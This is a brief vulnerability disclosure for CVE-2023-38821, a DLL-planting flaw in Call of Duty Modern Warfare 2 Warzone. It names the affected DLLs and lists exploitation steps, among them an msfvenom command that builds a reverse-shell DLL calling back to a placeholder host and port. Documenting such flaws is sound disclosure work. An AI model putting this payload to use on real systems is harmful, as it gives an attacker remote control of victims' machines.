DLL Planting in the CoD MW Warzone 2 - CVE-2023-38821 Discoverer: Idan Malihi
An issue in Activision Call of Duty Modern Warfare: Warzone v.2 allows a local attacker to execute arbitrary code via a crafted file to the UMPDC.dll, MSIMG32.dll, RTWorkQ.DLL, WINSTA.dll, CRYPTSP.dll, dnsapi.dll, MSASN1.dll, webio.dll, fwbase.dll, ncrypt.dll, and DPAPI.DLL components.
To exploit the DLL Planting vulnerability, an attacker should take the following steps:
- Download Steam.
- Download and Install Call of Duty Modern Warfare 2 Warzone
- Open the installation path folder, for example, D:\STEAM\steamapps\common\Call of Duty HQ
- Create a malicious dll file with msfvenom on Kali Linux OS: msfvenom -p windows/x64/meterpreter/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -o RTWorkQ.DLL
- Transfer the DLL file to the game's path D:\STEAM\steamapps\common\Call of Duty HQ
- Play the game and get a reverse shell.